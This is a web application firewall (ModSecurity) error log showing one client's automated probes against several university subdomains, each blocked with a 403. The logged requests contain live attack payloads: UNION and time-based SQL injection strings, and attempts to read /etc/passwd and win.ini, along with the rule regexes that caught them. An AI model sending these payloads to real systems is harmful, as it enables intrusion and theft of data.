[Tue Aug 29 11:40:32.438343 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcoNL0AAAAF"]
[Tue Aug 29 11:40:33.383054 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcPiyMAAAAa"]
[Tue Aug 29 11:40:33.383178 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcbR@UAAAAv"]
[Tue Aug 29 11:40:33.387641 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcYU2wAAAAp"]
[Tue Aug 29 11:40:33.391801 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAYf-HQAAAAD"]
[Tue Aug 29 11:40:33.419350 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAYMWQoAAAAR"]
[Tue Aug 29 11:40:36.382629 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAaJJ68AAAAJ"]
[Tue Aug 29 11:40:36.430963 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAcoNMkAAAAF"]
[Tue Aug 29 11:40:36.490453 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAQSWmgAAAA0"]
[Tue Aug 29 11:40:36.587009 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWR0AAAAR"]
[Tue Aug 29 11:40:36.612341 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWR4AAAAR"]
[Tue Aug 29 11:40:37.389622 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAYMWSEAAAAR"]
[Tue Aug 29 11:40:37.396335 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcoNMwAAAAF"]
[Tue Aug 29 11:40:37.410308 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAYMWSIAAAAR"]
[Tue Aug 29 11:40:37.417150 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcqJEAAAAAG"]
[Tue Aug 29 11:40:37.438896 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12xcCo-f0AAAcqJEEAAAAG"]
[Tue Aug 29 11:40:37.440085 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAQSWm8AAAA0"]
[Tue Aug 29 11:40:39.356466 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiyoAAAAa"]
[Tue Aug 29 11:40:39.363982 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcjAjsAAAAw"]
[Tue Aug 29 11:40:39.425751 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcjAjwAAAAw"]
[Tue Aug 29 11:40:39.485096 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiy0AAAAa"]
[Tue Aug 29 11:40:39.529144 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcjAj8AAAAw"]
[Tue Aug 29 11:40:40.370497 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAXbcM4AAAAL"]
[Tue Aug 29 11:40:40.390359 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAXbcM8AAAAL"]
[Tue Aug 29 11:40:40.435410 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12yMCo-f0AAAXbcNEAAAAL"]
[Tue Aug 29 11:40:41.411598 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12ycCo-f0AAAYf-IgAAAAD"]
[Tue Aug 29 11:40:43.411699 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12y8Co-f0AAAcYU4UAAAAp"]
